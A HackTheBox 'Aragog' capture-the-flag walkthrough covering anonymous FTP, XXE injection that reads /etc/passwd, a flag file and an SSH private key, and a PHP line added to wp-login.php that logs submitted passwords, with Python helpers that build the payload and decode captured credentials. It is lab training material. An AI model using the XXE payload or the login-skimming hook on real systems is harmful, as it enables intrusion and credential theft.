Aragog Box Writeup & Walkthrough – [HTB] – HackTheBox

This article shows, step by step, how to hack the Aragog box and obtain both user.txt and root.txt using Kali Linux and its standard tools.

Aragog is a machine on the HackTheBox platform.

Hack The Box is an online platform that lets you test your penetration testing skills and exchange ideas and methodologies with other members with similar interests. It contains several challenges that are updated constantly.

The rest of this article walks through the box from the initial port scan to root permission.

Before attacking the Aragog box, we first need to enumerate open ports. Execute the following nmap command to run a SYN scan of the target; -Pn skips the host-discovery ping, which the box may drop. Add -sV if you also want service versions. The scan identifies the open ports.

nmap -sS -Pn 10.10.10.78
Ports Scan

We identify that there are 3 ports open.

  1. FTP service running on port 21.
  2. SSH service running on port 22.
  3. HTTP service running on port 80.

Then we enumerate the HTTP service and check whether we can find anything on the website.

Website Enumeration

We find that there is a PHP file (hosts.php). This completes the initial enumeration, and we move to the next step.

We know that there is an FTP service. FTP commonly has weaknesses such as anonymous access and weak credentials. First, let us attempt to log in to the FTP service as the anonymous user.

We use the following credentials to log in to the FTP service.

Credential

Username: ftp

Password: ftp

FTP Anonymous User Login

After logging in to the FTP service, we find a TXT file, which we download with the "get" command.

We then check the content of the TXT file: it is actually an XML document describing a subnet mask, but we do not yet know how and where to use it.

Subnet Mask XML File

Then we move to the HTTP service: open a browser and navigate to the web application.

Observe that the web application displays a message:

There are 4294967294 possible hosts for

Aragog Box Web Application

After googling, we find that 4294967294 is 2^32 - 2: the number of usable hosts when the subnet mask is 0.0.0.0 (every IPv4 address minus the network and broadcast addresses), i.e. what hosts.php computes when it receives no subnet mask at all. The TXT file is also about a subnet mask. Therefore I assume that we can submit a crafted request to the endpoint (hosts.php), and that the request can be built from the content of the TXT file (test.txt).

We open Burp and the browser, navigate to the hosts.php page, intercept the GET request, and send it to Repeater.

Endpoint GET Method Response

Then we change the method to POST and use the TXT file's content as the request body.

Endpoint POST Method Response

We find that the website returns a valid response and calculates the possible hosts for the mask we supplied.

The POST body is XML, so the website may be vulnerable to XXE (XML External Entity) injection: if the server-side parser resolves external entities, an entity declared as SYSTEM "file:///etc/passwd" is expanded into the element it is referenced from, and the endpoint echoes that element back in its response. Let's create a payload and attempt to read the /etc/passwd file.

XXE Payload Read /etc/passwd File

To obtain user.txt, we only need to change the file location in the entity declaration to the user's flag file; /etc/passwd tells us which home directory to look in.
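The following Python is an added example, not code from the page or from the box: it models the hosts.php endpoint locally (the host count from a mask, and the echo of the mask field that makes the leak visible) and builds the XXE payload used for /etc/passwd, user.txt and id_rsa, with the file path as the only thing that changes. The element names details and subnet_mask are assumed from the structure of test.txt, the fallback to 4294967294 for a non-mask value is an assumption about hosts.php, and the file read in the demo is constructed in place of /etc/passwd.

```python
# Added example, not the page's or the box's own code: a local model of the
# hosts.php endpoint and the XXE payload the walkthrough sends to it.
# Assumptions: the POSTed document is <details><subnet_mask>...</subnet_mask></details>
# (element names taken from test.txt, treated here as assumed), the endpoint
# echoes the subnet_mask text back, and it falls back to the all-addresses
# figure 4294967294 when that text is not a valid mask.
import ipaddress
import os
import tempfile
from io import StringIO
from xml.sax import handler, make_parser

ROOT, FIELD = "details", "subnet_mask"   # assumed element names


def xxe_payload(path, root=ROOT, field=FIELD):
    """XML body that makes a parser resolving external entities splice the
    contents of `path` into the echoed element (/etc/passwd, user.txt, id_rsa...)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY xxe SYSTEM "file://{path}">]>\n'
        f"<{root}><{field}>&xxe;</{field}></{root}>"
    )


class _FieldText(handler.ContentHandler):
    """Collects the character data of one element, e.g. subnet_mask."""

    def __init__(self, field):
        super().__init__()
        self.field, self.value, self._inside = field, "", False

    def startElement(self, name, attrs):
        if name == self.field:
            self._inside, self.value = True, ""

    def endElement(self, name):
        if name == self.field:
            self._inside = False

    def characters(self, data):
        if self._inside:
            self.value += data


def read_field(xml, field=FIELD, resolve_external=False):
    """Parse the body with Python's expat-based SAX parser. resolve_external=True
    reproduces the vulnerable configuration (external general entities fetched
    from file:// URLs); False is the hardened default, which expands them to nothing."""
    parser = make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = _FieldText(field)
    parser.setContentHandler(collector)
    parser.parse(StringIO(xml))
    return collector.value


def possible_hosts(mask):
    """Usable addresses under a dotted-quad mask, network and broadcast excluded.
    0.0.0.0 (no mask) gives 2**32 - 2 = 4294967294, the number shown on the page."""
    return ipaddress.IPv4Network(("0.0.0.0", mask)).num_addresses - 2


def hosts_endpoint(body, resolve_external):
    """Model of hosts.php: compute the host count and echo the mask field."""
    mask = read_field(body, resolve_external=resolve_external)
    try:
        count = possible_hosts(mask.strip())
    except ValueError:          # not a mask: the field is empty or holds file content
        count = possible_hosts("0.0.0.0")
    return f"There are {count} possible hosts for {mask}"


def demo():
    """Run the payload against the vulnerable and the hardened parser,
    using a constructed file in place of /etc/passwd."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "passwd")
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/bash\n"
                    "XXE-SECRET:x:1000:1000::/home/x:/bin/bash\n")
        body = xxe_payload(secret)
        return {
            "vulnerable": hosts_endpoint(body, resolve_external=True),
            "hardened": hosts_endpoint(body, resolve_external=False),
        }


if __name__ == "__main__":
    for name, response in demo().items():
        print(f"{name}: {response}")
```

Against the real target, the string returned by xxe_payload("/etc/passwd") is pasted as the POST body in Burp Repeater; the hardened branch shows the fix on the server side, which is to leave external general entities disabled in the XML parser.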

XXE Payload Read user.txt File

Now we are going to obtain root.txt. To gain root access we have to do privilege escalation.

We first need a shell before performing privilege escalation. As our scan showed, an SSH service is running on this server.

SSH supports two ways to log in: with a password, or with a key pair. We can obtain the user's private key by reading the SSH key file (.ssh/id_rsa in that user's home directory) with the same XXE payload.

XXE Payload Read id_rsa File

We copy the key to the local Kali machine, set its permissions to 600 (ssh refuses a key file that other users can read), and use it with ssh -i to log in to the target server as that user.

SSH to Target Server

Then we go to the web directory (/var/www/html).

Web Directory

There is a folder called "dev_wiki". We visit it in the browser.

Aragog Dev Wiki Website

Based on the website, we learn that the user "Cliff" resets the site regularly and that it runs the WordPress CMS. If we can capture the username and password used for that login, we may be able to log in as Cliff or as root, since users often reuse the same password between the web application and the server.

We then edit wp-login.php and add the following line, placed so that it runs on every request to the login page before WordPress handles the form. It appends the raw request body (which for a login contains the log and pwd fields) to a file we can read; the web server process must be able to write to that path.

// Log the raw POST body of every wp-login.php request to login.req
file_put_contents('/var/www/html/login.req', file_get_contents('php://input') . PHP_EOL, FILE_APPEND);
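As an added example that is not part of the original page, the following Python decodes the lines the hook above appends to login.req and pulls out the WordPress username and password. Form posts are percent-encoded, so a password containing characters such as "!", "&" or "+" must be decoded before it is reused; the sample capture is constructed and its values are invented.

```python
# Added example, not the page's code: decode the request bodies that the
# wp-login.php hook appends to login.req (one form post per line) and pull out
# the WordPress username and password. The sample below is constructed; the
# values in it are invented and are not the box's real credentials.
from urllib.parse import parse_qs

SAMPLE_LOGIN_REQ = (
    # a scripted login, percent-encoded the way a browser or curl sends a form
    "log=cliff&pwd=Examp%21e%26Pass%2B1&wp-submit=Log+In"
    "&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F&testcookie=1\n"
    # a GET of the login page has no body, so the hook logs a blank line
    "\n"
    # a submission with an empty password field, which we skip
    "log=cliff&pwd=&wp-submit=Log+In\n"
)


def extract_credentials(captured):
    """Return (username, password) pairs, percent-decoded, from login.req text.
    parse_qs undoes the form encoding, so '+' and %XX sequences in the password
    come back as the literal characters the client sent."""
    creds = []
    for line in captured.splitlines():
        fields = parse_qs(line, keep_blank_values=True)
        user = fields.get("log", [""])[0]
        password = fields.get("pwd", [""])[0]
        if user and password:
            creds.append((user, password))
    return creds


if __name__ == "__main__":
    for user, password in extract_credentials(SAMPLE_LOGIN_REQ):
        print(f"{user}:{password}")
```

On the box, run extract_credentials over the contents of /var/www/html/login.req once the scheduled login has fired; the decoded password is the one to try with su or ssh.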

After a few minutes, once Cliff's scheduled reset has logged in to WordPress, we successfully obtain the user's credentials.

Capture User Credential

We log in to the server again as root with the captured password, and the login succeeds: the WordPress password was reused for the root account.

Gain root access

This box is not too difficult. I spent most of the time on the initial step (around 3 hours). I was thinking that it was a code injection vulnerability; I attempted several payloads, but they did not work. After I identified it was XXE, everything was easy.